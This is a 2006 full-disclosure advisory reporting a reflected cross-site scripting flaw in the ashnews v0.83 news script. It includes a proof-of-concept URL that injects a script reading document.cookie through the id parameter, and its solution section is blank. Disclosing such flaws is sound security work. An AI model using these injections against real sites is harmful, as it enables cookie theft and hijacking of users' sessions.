[Full-disclosure] ashnews Cross-Site Scripting Vulnerability

2006-01-30T00:00:00
ID SECURITYVULNS:DOC:11232
Type securityvulns
Reporter Securityvulns
Modified 2006-01-30T00:00:00

Description

Advisory #5 Title: ashnews Cross-Site Scripting Vulnerability

Author: 0o_zeus_o0 and fraude

Contact: zeus@diosdelared.com

Website: Elitemexico.org

Date: 30/01/2006

Risk: High

Vendor Url: http://dev.ashwebstudio.com/

Affected Software: ashnews

Non Affected:

We Are: olimpus klan team

TECHNICAL INFO

================================================================

A cross-site scripting vulnerability that allows cookie theft and hijacking of the user's session.

Example:

http://www.url.com/[path]/ashnews.php?page=showcomments&id=<script><script>alert(document.cookie)</script>

http://www.url.com/[path]/ashnews.php?page=showcomments&id=[xss]

Solution:

VULNERABLE VERSIONS

================================================================

ashnews v0.83. Other versions may also be affected.

================================================================

Contact information

0o_zeus_o0

zeus@diosdelared.com

www.olimpusklan.org

================================================================

greetz: lady fire,Mi beba, fraude and security-mx

########################################################################